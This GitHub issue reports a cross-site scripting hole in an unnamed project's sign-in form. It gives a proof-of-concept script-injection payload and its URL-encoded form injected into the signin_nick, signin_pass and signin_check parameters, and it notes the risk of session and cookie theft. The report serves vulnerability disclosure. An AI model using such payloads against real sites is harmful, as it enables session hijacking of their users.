There is one xss vulnerability #846

Open
flowertimes opened this issue Jun 9, 2023 · 1 comment

@flowertimes

There is one xss vulnerability

poc

"'><script>alert([VARIANT ID])</script>

The following changes have been applied to the original request:
The value of parameter 'signin_nick' has been set to '%3E%22%27%3E%3Cscript%3Ealert%2869%29%3C%2Fscript%3E'
The value of parameter 'signin_pass' has been set to '%3E%22%27%3E%3Cscript%3Ealert%2869%29%3C%2Fscript%3E'
The value of parameter 'signin_check' has been set to '%3E%22%27%3E%3Cscript%3Ealert%2869%29%3C%2Fscript%3E'

@flowertimes
Author

There is an XSS vulnerability. May steal or manipulate customer sessions and cookies, which may be used to impersonate legitimate users, allowing hackers to view or change user records and execute transactions as that user.
